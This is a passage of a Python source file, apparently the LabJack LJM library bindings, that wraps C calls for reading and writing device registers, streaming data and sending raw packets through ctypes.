    cAddresses = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
    cDataTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
    cReadVals = (ctypes.c_double * numFrames)()
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eReadAddresses(handle, ctypes.c_int32(numFrames),
                                        ctypes.byref(cAddresses),
                                        ctypes.byref(cDataTypes),
                                        ctypes.byref(cReadVals),
                                        ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific frame.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
    return _convertCtypeArrayToList(cReadVals)
def eReadNames(handle, numFrames, aNames):
    """Reads multiple register values from a device, addressed by name.

    Args:
        handle: A valid handle to an open device.
        numFrames: The total number of reads to perform.
        aNames: List of names (strings) to read. This list needs to be
            at least size numFrames.

    Returns:
        A list of read values.

    Raises:
        TypeError: aNames is not a list of strings.
        LJMError: An error was returned from the LJM library call.
    """
    encodedNames = []
    for item in aNames:
        if not isinstance(item, str):
            raise TypeError("Expected a string list but found an item " + str(type(item)) + ".")
        encodedNames.append(item.encode("ascii"))
    cNames = _convertListToCtypeArray(encodedNames, ctypes.c_char_p)
    cReadVals = (ctypes.c_double * numFrames)()
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eReadNames(handle, ctypes.c_int32(numFrames), cNames,
                                    ctypes.byref(cReadVals),
                                    ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific frame.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
    return _convertCtypeArrayToList(cReadVals)
def eWriteAddresses(handle, numFrames, aAddresses, aDataTypes, aValues):
    """Performs Modbus operations that writes values to a device.

    Args:
        handle: A valid handle to an open device.
        numFrames: The total number of writes to perform.
        aAddresses: List of addresses to write. This list needs to be at
            least size numFrames.
        aDataTypes: List of data types corresponding to aAddresses
            (labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
            etc.). This list needs to be at least size numFrames.
        aValues: The list of values to write. This list needs to be at
            least size numFrames.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cNumFrames = ctypes.c_int32(numFrames)
    cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
    cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
    cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
    # (A former "numFrames = len(cAddrs)" rebinding was removed here: it had
    # no effect because cNumFrames above is what the C call actually uses.)
    cErrorAddr = ctypes.c_int32(-1)
    error = _staticLib.LJM_eWriteAddresses(handle, cNumFrames, ctypes.byref(cAddrs), ctypes.byref(cTypes), ctypes.byref(cVals), ctypes.byref(cErrorAddr))
    if error != errorcodes.NOERROR:
        errAddr = cErrorAddr.value
        # -1 from LJM means the error is not tied to a specific frame.
        if errAddr == -1:
            errAddr = None
        raise LJMError(error, errAddr)
def eWriteNames(handle, numFrames, aNames, aValues):
    """Writes multiple register values to a device, addressed by name.

    Args:
        handle: A valid handle to an open device.
        numFrames: The total number of writes to perform.
        aNames: List of names (strings) to write. This list needs to be
            at least size numFrames.
        aValues: List of values to write. This list needs to be at least
            size numFrames.

    Raises:
        TypeError: aNames is not a list of strings.
        LJMError: An error was returned from the LJM library call.
    """
    encodedNames = []
    for item in aNames:
        if not isinstance(item, str):
            raise TypeError("Expected a string list but found an item " + str(type(item)) + ".")
        encodedNames.append(item.encode("ascii"))
    cNames = _convertListToCtypeArray(encodedNames, ctypes.c_char_p)
    cWriteVals = _convertListToCtypeArray(aValues, ctypes.c_double)
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eWriteNames(handle, ctypes.c_int32(numFrames),
                                     ctypes.byref(cNames),
                                     ctypes.byref(cWriteVals),
                                     ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific frame.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
def eReadAddressArray(handle, address, dataType, numValues):
    """Reads an array of values starting at a register address.

    Args:
        handle: A valid handle to an open device.
        address: The address to read an array from.
        dataType: The data type of address.
        numValues: The size of the array to read.

    Returns:
        A list of size numValues with the read values.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note:
        If numValues is large enough, this functions will automatically
        split reads into multiple packets based on the current device's
        effective data packet size. Using both non-buffer and buffer
        registers in one function call is not supported.
    """
    cReadVals = (ctypes.c_double * numValues)()
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eReadAddressArray(handle,
                                           ctypes.c_int32(address),
                                           ctypes.c_int32(dataType),
                                           ctypes.c_int32(numValues),
                                           ctypes.byref(cReadVals),
                                           ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
    return _convertCtypeArrayToList(cReadVals)
def eReadNameArray(handle, name, numValues):
    """Reads an array of values starting at a named register.

    Args:
        handle: A valid handle to an open device.
        name: The register name to read an array from.
        numValues: The size of the array to read.

    Returns:
        A list of size numValues with the read values.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.

    Note:
        If numValues is large enough, this functions will automatically
        split reads into multiple packets based on the current device's
        effective data packet size. Using both non-buffer and buffer
        registers in one function call is not supported.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    cReadVals = (ctypes.c_double * numValues)()
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eReadNameArray(handle, name.encode("ascii"),
                                        ctypes.c_int32(numValues),
                                        ctypes.byref(cReadVals),
                                        ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
    return _convertCtypeArrayToList(cReadVals)
def eWriteAddressArray(handle, address, dataType, numValues, aValues):
    """Writes an array of values starting at a register address.

    Args:
        handle: A valid handle to an open device.
        address: The address to write an array to.
        dataType: The data type of address.
        numValues: The size of the array to write.
        aValues: List of values to write. This list needs to be at least
            size numValues.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note:
        If numValues is large enough, this functions will automatically
        split writes into multiple packets based on the current
        device's effective data packet size. Using both non-buffer and
        buffer registers in one function call is not supported.
    """
    cWriteVals = _convertListToCtypeArray(aValues, ctypes.c_double)
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eWriteAddressArray(handle,
                                            ctypes.c_int32(address),
                                            ctypes.c_int32(dataType),
                                            ctypes.c_int32(numValues),
                                            ctypes.byref(cWriteVals),
                                            ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
def eWriteNameArray(handle, name, numValues, aValues):
    """Writes an array of values starting at a named register.

    Args:
        handle: A valid handle to an open device.
        name: The register name to write an array to.
        numValues: The size of the array to write.
        aValues: List of values to write. This list needs to be at least
            size numValues.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.

    Note:
        If numValues is large enough, this functions will automatically
        split writes into multiple packets based on the current
        device's effective data packet size. Using both non-buffer and
        buffer registers in one function call is not supported.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    cWriteVals = _convertListToCtypeArray(aValues, ctypes.c_double)
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eWriteNameArray(handle, name.encode("ascii"),
                                         ctypes.c_int32(numValues),
                                         ctypes.byref(cWriteVals),
                                         ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
def eReadAddressByteArray(handle, address, numBytes):
    """Reads a byte array starting at a register address.

    Args:
        handle: A valid handle to an open device.
        address: The address to read an array from.
        numBytes: The size of the byte array to read.

    Returns:
        A list of size numBytes with the read byte values.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Notes:
        This function will append a 0x00 byte to aBytes for
        odd-numbered numBytes.
        If numBytes is large enough, this functions will automatically
        split reads into multiple packets based on the current device's
        effective data packet size. Using both non-buffer and buffer
        registers in one function call is not supported.
    """
    cReadBytes = (ctypes.c_ubyte * numBytes)()
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eReadAddressByteArray(handle,
                                               ctypes.c_int32(address),
                                               ctypes.c_int32(numBytes),
                                               ctypes.byref(cReadBytes),
                                               ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
    return _convertCtypeArrayToList(cReadBytes)
def eReadNameByteArray(handle, name, numBytes):
    """Reads a byte array starting at a named register.

    Args:
        handle: A valid handle to an open device.
        name: The register name to read an array from.
        numBytes: The size of the byte array to read.

    Returns:
        A list of size numBytes with the read byte values.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.

    Notes:
        This function will append a 0x00 byte to aBytes for
        odd-numbered numBytes.
        If numBytes is large enough, this functions will automatically
        split reads into multiple packets based on the current device's
        effective data packet size. Using both non-buffer and buffer
        registers in one function call is not supported.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    cReadBytes = (ctypes.c_ubyte * numBytes)()
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eReadNameByteArray(handle, name.encode("ascii"),
                                            ctypes.c_int32(numBytes),
                                            ctypes.byref(cReadBytes),
                                            ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
    return _convertCtypeArrayToList(cReadBytes)
def eWriteAddressByteArray(handle, address, numBytes, aBytes):
    """Writes a byte array starting at a register address.

    Args:
        handle: A valid handle to an open device.
        address: The register address to write a byte array to.
        numBytes: The size of the byte array to write.
        aBytes: List of byte values to write. This list needs to be at
            least size numBytes.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Notes:
        This function will append a 0x00 byte to aBytes for
        odd-numbered numBytes.
        If numBytes is large enough, this functions will automatically
        split writes into multiple packets based on the current
        device's effective data packet size. Using both non-buffer and
        buffer registers in one function call is not supported.
    """
    # Accept str input by converting it to a byte list first.
    cWriteBytes = _convertListToCtypeArray(_coerceToByteArrayIfString(aBytes),
                                           ctypes.c_ubyte)
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eWriteAddressByteArray(handle,
                                                ctypes.c_int32(address),
                                                ctypes.c_int32(numBytes),
                                                ctypes.byref(cWriteBytes),
                                                ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
def eWriteNameByteArray(handle, name, numBytes, aBytes):
    """Writes a byte array starting at a named register.

    Args:
        handle: A valid handle to an open device.
        name: The register name to write an array to.
        numBytes: The size of the byte array to write.
        aBytes: List of byte values to write. This list needs to be at
            least size numBytes.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.

    Notes:
        This function will append a 0x00 byte to aBytes for
        odd-numbered numBytes.
        If numBytes is large enough, this functions will automatically
        split writes into multiple packets based on the current
        device's effective data packet size. Using both non-buffer and
        buffer registers in one function call is not supported.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    # Accept str input by converting it to a byte list first.
    cWriteBytes = _convertListToCtypeArray(_coerceToByteArrayIfString(aBytes),
                                           ctypes.c_ubyte)
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eWriteNameByteArray(handle, name.encode("ascii"),
                                             ctypes.c_int32(numBytes),
                                             ctypes.byref(cWriteBytes),
                                             ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific address.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
def eAddresses(handle, numFrames, aAddresses, aDataTypes, aWrites, aNumValues, aValues):
    """Performs mixed read/write Modbus operations, addressed by number.

    Args:
        handle: A valid handle to an open device.
        numFrames: The total number of reads/writes to perform.
        aAddresses: List of addresses to write. This list needs to be at
            least size numFrames.
        aDataTypes: List of data types corresponding to aAddresses
            (labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
            etc.). This list needs to be at least size numFrames.
        aWrites: List of directions (labjack.ljm.constants.READ or
            labjack.ljm.constants.WRITE) corresponding to aAddresses.
            This list needs to be at least size numFrames.
        aNumValues: List of the number of values to read/write,
            corresponding to aWrites and aAddresses. This list needs to
            be at least size numFrames.
        aValues: List of values to write. This list needs to be the
            length of the sum of the aNumValues list's values. Values
            corresponding to writes are written.

    Returns:
        The list of aValues written/read.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Notes:
        For every entry aWrites[i] that is labjack.ljm.constants.WRITE,
        aValues contains aNumValues[i] values to write; for every entry
        that is labjack.ljm.constants.READ, aValues contains
        aNumValues[i] blank/garbage values that are updated in the
        returned list. aValues must be ordered to match the other lists.
        For example, if aWrites is [WRITE, READ, WRITE] and aNumValues
        is [1, 4, 2], aValues holds one value to write, then 4
        blank/garbage values, then 2 values to write.
    """
    cAddresses = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
    cDataTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
    cDirections = _convertListToCtypeArray(aWrites, ctypes.c_int32)
    cCounts = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
    cValues = _convertListToCtypeArray(aValues, ctypes.c_double)
    cErrAddr = ctypes.c_int32(-1)
    err = _staticLib.LJM_eAddresses(handle, ctypes.c_int32(numFrames),
                                    ctypes.byref(cAddresses),
                                    ctypes.byref(cDataTypes),
                                    ctypes.byref(cDirections),
                                    ctypes.byref(cCounts),
                                    ctypes.byref(cValues),
                                    ctypes.byref(cErrAddr))
    if err != errorcodes.NOERROR:
        # -1 from LJM means the error is not tied to a specific frame.
        raise LJMError(err, None if cErrAddr.value == -1 else cErrAddr.value)
    return _convertCtypeArrayToList(cValues)
def eNames(handle, numFrames, aNames, aWrites, aNumValues, aValues):
    """Performs Modbus operations that reads/writes values to a device.

    Args:
        handle: A valid handle to an open device.
        numFrames: The total number of reads/writes to perform. This
            needs to be the length of aNames/aWrites/aNumValues or less.
        aNames: List of names (strings) to write/read. This list needs
            to be at least size numFrames.
        aWrites: List of directions (labjack.ljm.constants.READ or
            labjack.ljm.constants.WRITE) corresponding to aNames. This
            list needs to be at least size numFrames.
        aNumValues: List of the number of values to read/write,
            corresponding to aWrites and aNames. This list needs to be
            at least size numFrames.
        aValues: List of values to write. This list needs to be the
            length of the sum of the aNumValues list's values. Values
            corresponding to writes are written.

    Returns:
        The list of aValues written/read.

    Raises:
        TypeError: aNames is not a list of strings.
        LJMError: An error was returned from the LJM library call.

    Notes:
        For every entry in aWrites[i] that is
        labjack.ljm.constants.WRITE, aValues contains aNumValues[i]
        values to write and for every entry in aWrites that is
        labjack.ljm.constants.READ, aValues contains aNumValues[i]
        values that will be updated in the returned list. aValues values
        must be in the same order as the rest of the lists. For example,
        if aWrite is:
            [labjack.ljm.constants.WRITE, labjack.ljm.constants.READ,
            labjack.ljm.constants.WRITE]
        and aNumValues is:
            [1, 4, 2]
        aValues would have one value to be written, then 4 blank/garbage
        values, and then 2 values to be written.
    """
    cNumFrames = ctypes.c_int32(numFrames)
    asciiNames = []
    for x in aNames:
        if not isinstance(x, str):
            raise TypeError("Expected a string list but found an item " + str(type(x)) + ".")
        asciiNames.append(x.encode("ascii"))
    cNames = _convertListToCtypeArray(asciiNames, ctypes.c_char_p)
    cWrites = _convertListToCtypeArray(aWrites, ctypes.c_int32)
    cNumVals = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
    cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
    cErrorAddr = ctypes.c_int32(-1)
    error = _staticLib.LJM_eNames(handle, cNumFrames, ctypes.byref(cNames), ctypes.byref(cWrites), ctypes.byref(cNumVals), ctypes.byref(cVals), ctypes.byref(cErrorAddr))
    if error != errorcodes.NOERROR:
        errAddr = cErrorAddr.value
        # Normalize the -1 "no specific frame" sentinel to None, matching
        # eAddresses and the other multi-frame functions in this module.
        if errAddr == -1:
            errAddr = None
        raise LJMError(error, errAddr)
    return _convertCtypeArrayToList(cVals)
def eReadNameString(handle, name):
    """Reads a string from a device.

    Args:
        handle: A valid handle to an open device.
        name: The string name of a register to read.

    Returns:
        The read string.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.

    Note: This is a convenience function for eNames.
    """
    if not isinstance(name, str):
        raise TypeError("Expected a string instead of " + str(type(name)) + ".")
    # Zero-filled fixed-size buffer the C call writes the string into.
    readBuffer = b"\0" * constants.STRING_ALLOCATION_SIZE
    err = _staticLib.LJM_eReadNameString(handle, name.encode("ascii"), readBuffer)
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return _decodeASCII(readBuffer)
def eReadAddressString(handle, address):
    """Reads a string from a device.

    Args:
        handle: A valid handle to an open device.
        address: The integer address of a register to read.

    Returns:
        The read string.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Note: This is a convenience function for eNames.
    """
    # Zero-filled fixed-size buffer the C call writes the string into.
    readBuffer = b"\0" * constants.STRING_ALLOCATION_SIZE
    err = _staticLib.LJM_eReadAddressString(handle, ctypes.c_int32(address), readBuffer)
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return _decodeASCII(readBuffer)
def eWriteNameString(handle, name, string):
    """Writes a string to a device.

    Args:
        handle: A valid handle to an open device.
        name: The string name of a register to write.
        string: The string to write.

    Raises:
        TypeError: name is not a string.
        LJMError: An error was returned from the LJM library call.

    Note: This is a convenience function for eNames.
    """
    for arg in (name, string):
        if not isinstance(arg, str):
            raise TypeError("Expected a string instead of " + str(type(arg)) + ".")
    err = _staticLib.LJM_eWriteNameString(handle, name.encode("ascii"),
                                          string.encode("ascii"))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def eWriteAddressString(handle, address, string):
    """Writes a string to a device.

    Args:
        handle: A valid handle to an open device.
        address: The integer address of a register to write.
        string: The string to write.

    Raises:
        TypeError: string parameter is not a string.
        LJMError: An error was returned from the LJM library call.

    Note: This is a convenience function for eNames.
    """
    if not isinstance(string, str):
        raise TypeError("Expected a string instead of " + str(type(string)) + ".")
    err = _staticLib.LJM_eWriteAddressString(handle, ctypes.c_int32(address),
                                             string.encode("ascii"))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
# Per-handle stream bookkeeping: maps a device handle to
# scansPerRead * numAddresses as configured by eStreamStart, so that
# eStreamRead knows how large a data buffer to allocate for that handle.
_g_eStreamDataSize = {}
def eStreamStart(handle, scansPerRead, numAddresses, aScanList, scanRate):
    """Initializes a stream object and begins streaming. This includes
    creating a buffer in LJM that collects data from the device.

    Args:
        handle: A valid handle to an open device.
        scansPerRead: Number of scans returned by each call to the
            eStreamRead function. This is not tied to the maximum
            packet size for the device.
        numAddresses: The size of aScanList. The number of addresses to
            scan.
        aScanList: List of Modbus addresses to collect samples from,
            per scan.
        scanRate: Sets the desired number of scans per second.

    Returns:
        The actual scan rate the device will scan at.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Notes:
        Address configuration such as range, resolution, and
        differential voltages must be handled elsewhere.
        Check your device's documentation for valid aScanList channels.
    """
    cScanList = _convertListToCtypeArray(aScanList, ctypes.c_int32)
    cScanRate = ctypes.c_double(scanRate)
    # Record how many values each subsequent eStreamRead must return.
    _g_eStreamDataSize[handle] = scansPerRead * numAddresses
    err = _staticLib.LJM_eStreamStart(handle,
                                      ctypes.c_int32(scansPerRead),
                                      ctypes.c_int32(numAddresses),
                                      ctypes.byref(cScanList),
                                      ctypes.byref(cScanRate))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    # LJM updates cScanRate in place with the actual rate.
    return cScanRate.value
def eStreamRead(handle):
    """Returns data from an initialized and running LJM stream buffer.
    Waits for data to become available, if necessary.

    Args:
        handle: A valid handle to an open device.

    Returns:
        A tuple (aData, deviceScanBacklog, ljmScanBacklog) where:
        aData: Stream data list with all channels interleaved. It will
            contain scansPerRead*numAddresses values configured from
            eStreamStart. The data returned is removed from the LJM
            stream buffer.
        deviceScanBacklog: The number of scans left in the device
            buffer, as measured from when data was last collected from
            the device. This should usually be near zero and not
            growing.
        ljmScanBacklog: The number of scans left in the LJM buffer, as
            measured from after the data returned from this function is
            removed from the LJM buffer. This should usually be near
            zero and not growing.

    Raises:
        LJMError: An error was returned from the LJM library call or
            eStreamStart was not called first on the handle and
            the aData size cannot be determined.
    """
    try:
        bufferSize = _g_eStreamDataSize[handle]
    except KeyError:
        raise LJMError(errorString="Streaming has not been started for the given handle. Please call eStreamStart first.")
    cData = (ctypes.c_double * bufferSize)()
    cDeviceBacklog = ctypes.c_int32(0)
    cLjmBacklog = ctypes.c_int32(0)
    err = _staticLib.LJM_eStreamRead(handle, ctypes.byref(cData),
                                     ctypes.byref(cDeviceBacklog),
                                     ctypes.byref(cLjmBacklog))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return _convertCtypeArrayToList(cData), cDeviceBacklog.value, cLjmBacklog.value
def setStreamCallback(handle, callback):
    """Sets a callback that is called by LJM when the stream has
    collected scansPerRead scans (see eStreamStart) or if an error has
    occurred.
    Args:
        handle: A valid handle to an open device.
        callback: The callback function for LJM's stream thread to call
            when stream data is ready, which should call
            LJM_eStreamRead to acquire data. The handle will be the
            single argument of the callback.
    Raises:
        LJMError: An error was returned from the LJM library call.
    Notes:
        setStreamCallback should be called after eStreamStart.
        To disable the previous callback for stream reading, pass 0 or
        None as the callback.
        setStreamCallback may not be called from within a callback.
        callback may not use data stored in `threading.local`.
        The handle is passed as the argument to callback because if you
        have multiple devices running with setStreamCallback, you might
        want to check which handle had stream data ready.
    """
    if callback is None or callback == 0:
        # 0/0 tells LJM to clear any previously registered callback.
        cbLjm = 0
        cbArg = 0
    else:
        # Wrap the Python callable in the ctypes callback machinery.
        cbData = _StreamCallbackData(handle, callback)
        # Keep a module-level reference to the wrapper; presumably this
        # prevents it from being garbage-collected while LJM still holds
        # the callback pointer (cleared again by eStreamStop).
        _g_streamCallbackData[handle] = cbData
        cbLjm = cbData.callbackLjm
        cbArg = cbData.argRef
    error = _staticLib.LJM_SetStreamCallback(handle, cbLjm, cbArg)
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def eStreamStop(handle):
    """Stops the LJM library from streaming any more data from the
    device, while leaving any collected data in the LJM library's
    buffer to be read. Stops the device from streaming.

    Args:
        handle: A valid handle to an open device.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    # Discard per-handle bookkeeping created by eStreamStart and
    # setStreamCallback (no-op if absent).
    _g_eStreamDataSize.pop(handle, None)
    _g_streamCallbackData.pop(handle, None)
    err = _staticLib.LJM_eStreamStop(handle)
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def streamBurst(handle, numAddresses, aScanList, scanRate, numScans):
    """Collects a fixed number of stream scans in one call. Combines
    eStreamStart, eStreamRead, and eStreamStop, plus some other device
    initialization.

    Args:
        handle: A valid handle to an open device.
        numAddresses: The size of aScanList. The number of addresses to
            scan.
        aScanList: A list of Modbus addresses to collect samples from,
            per scan.
        scanRate: Sets the desired number of scans per second.
        numScans: The number of scans to collect. This is how many
            burst scans are collected and may not be zero.

    Returns:
        A tuple (scanRate, aData) where:
        scanRate: The actual scan rate that the device scanned at.
        aData: List of streamed data. Returns all addresses
            interleaved. This will hold (numScans * numAddresses)
            values.

    Raises:
        LJMError: An error was returned from the LJM library call.

    Notes:
        Address configuration such as range, resolution, and
        differential voltages are handled by writing to the device.
        Check your device's documentation for which addresses are valid
        for aScanList and how many burst scans may be collected.
        This function will block for (numScans / scanRate) seconds or
        longer.
    """
    cScanList = _convertListToCtypeArray(aScanList, ctypes.c_int32)
    cScanRate = ctypes.c_double(scanRate)
    cBurstData = (ctypes.c_double * (numScans * numAddresses))()
    err = _staticLib.LJM_StreamBurst(handle,
                                     ctypes.c_int32(numAddresses),
                                     ctypes.byref(cScanList),
                                     ctypes.byref(cScanRate),
                                     ctypes.c_uint32(numScans),
                                     ctypes.byref(cBurstData))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    # LJM updates cScanRate in place with the actual rate.
    return cScanRate.value, _convertCtypeArrayToList(cBurstData)
def getStreamTCPReceiveBufferStatus(handle):
    """Gets the backlog status of the TCP receive buffer.

    Args:
        handle: A valid handle to an open device running a TCP based
            stream.

    Returns:
        A tuple (receiveBufferBytesSize, receiveBufferBytesBacklog)
        where:
        receiveBufferBytesSize: The current maximum number of bytes
            that can be stored in the receive buffer before it is full.
        receiveBufferBytesBacklog: The current number of bytes stored
            in the receive buffer.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cBufferSize = ctypes.c_uint32(0)
    cBufferBacklog = ctypes.c_uint32(0)
    err = _staticLib.LJM_GetStreamTCPReceiveBufferStatus(
        handle, ctypes.byref(cBufferSize), ctypes.byref(cBufferBacklog))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return cBufferSize.value, cBufferBacklog.value
def initializeAperiodicStreamOut(handle, streamOutIndex, targetAddr, scanRate):
    """Initializes all device registers necessary to start an aperiodic
    stream-out.

    Args:
        handle: A valid handle to an open device.
        streamOutIndex: The index number of this stream-out.
            Note: T-series devices support a maximum of 4 stream-outs.
        targetAddr: The register to update during stream-out
            stored in the receive buffer before it is full.
        scanRate: The scan rate that the stream is initialized to.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    err = _staticLib.LJM_InitializeAperiodicStreamOut(
        handle,
        ctypes.c_int32(streamOutIndex),
        ctypes.c_int32(targetAddr),
        ctypes.c_double(scanRate))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
def writeAperiodicStreamOut(handle, streamOutIndex, numValues, aWriteData):
    """Writes data to the buffer of the specified aperiodic stream-out.

    Args:
        handle: A valid handle to an open device.
        streamOutIndex: The index number of this stream-out.
        numValues: The number of values to write to the stream-out
            buffer.
        aWriteData: The data list to be written to the stream-out.
            Note: the size of the array should be equal to the buffer
            size in bytes divided by 4 (BufferNumBytes / 4).

    Returns:
        LJMBufferStatus: The number of samples that can be written to
            the stream-out queue.

    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cWriteData = _convertListToCtypeArray(aWriteData, ctypes.c_double)
    cBufferStatus = ctypes.c_int32(0)
    err = _staticLib.LJM_WriteAperiodicStreamOut(handle,
                                                 ctypes.c_int32(streamOutIndex),
                                                 ctypes.c_int32(numValues),
                                                 ctypes.byref(cWriteData),
                                                 ctypes.byref(cBufferStatus))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return cBufferStatus.value
def periodicStreamOut(handle, streamOutIndex, targetAddr, scanRate, numValues, aWriteData):
    """Initializes all registers necessary to start streaming out a
    periodic waveform (looping over the values written to the
    function).
    Args:
        handle: A valid handle to an open device.
        streamOutIndex: The index number of this stream-out.
        targetAddr: The register address to update during stream-out.
        scanRate: The scan rate that the stream is initialized to.
        numValues: The number of values to write to the stream-out
            buffer.
        aWriteData: The data list to be written to the stream-out
            buffer (this should be one period of the waveform).
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cStreamIndex = ctypes.c_int32(streamOutIndex)
    cTargetAddr = ctypes.c_int32(targetAddr)
    cScanRate = ctypes.c_double(scanRate)
    cNumValues = ctypes.c_int32(numValues)
    cWriteData_p = _convertListToCtypeArray(aWriteData, ctypes.c_double)
    error = _staticLib.LJM_PeriodicStreamOut(handle, cStreamIndex, cTargetAddr, cScanRate, cNumValues, ctypes.byref(cWriteData_p))
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def writeRaw(handle, data, numBytes=None):
    """Sends an unaltered data packet to a device.
    Args:
        handle: A valid handle to an open device.
        data: The byte list/packet to send.
        numBytes: The number of bytes to send. Default is None and will
            automatically send all the bytes in the data list.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    cData = _convertListToCtypeArray(data, ctypes.c_ubyte)
    if numBytes is None:
        # Default: send the whole converted buffer.
        numBytes = len(cData)
    cNumBytes = ctypes.c_int32(numBytes)
    error = _staticLib.LJM_WriteRaw(handle, ctypes.byref(cData), cNumBytes)
    if error != errorcodes.NOERROR:
        raise LJMError(error)
def readRaw(handle, numBytes):
    """Reads an unaltered data packet from a device.
    Args:
        handle: A valid handle to an open device.
        numBytes: The number of bytes to receive.
    Returns:
        A list that is the read byte packet. It is length numBytes.
    Raises:
        LJMError: An error was returned from the LJM library call.
    """
    # Allocate a zeroed receive buffer of exactly numBytes bytes.
    recvBuffer = (ctypes.c_ubyte * numBytes)()
    err = _staticLib.LJM_ReadRaw(handle, ctypes.byref(recvBuffer), ctypes.c_int32(numBytes))
    if err != errorcodes.NOERROR:
        raise LJMError(err)
    return _convertCtypeArrayToList(recvBuffer)
def addressesToMBFB(maxBytesPerMBFB, aAddresses, aDataTypes, aWrites, aNumValues, aValues, numFrames, aMBFBCommand=None):
    """Takes in lists that together represent operations to be performed
    on a device and returns the numbers of frames created and a byte
    list representing a valid Modbus Feedback command.
    Args:
        maxBytesPerMBFB: The maximum number of bytes that the Feedback
            command is allowed to consist of. It is highly recommended
            to pass the size of MaxBytesPerMBFB to prevent buffer
            overflow.
        aAddresses: A list of size numFrames representing the register
            addresses to read from or write to for each frame.
        aDataTypes: A list of size numFrames representing the data types
            to read or write. See the Data Type constants in the
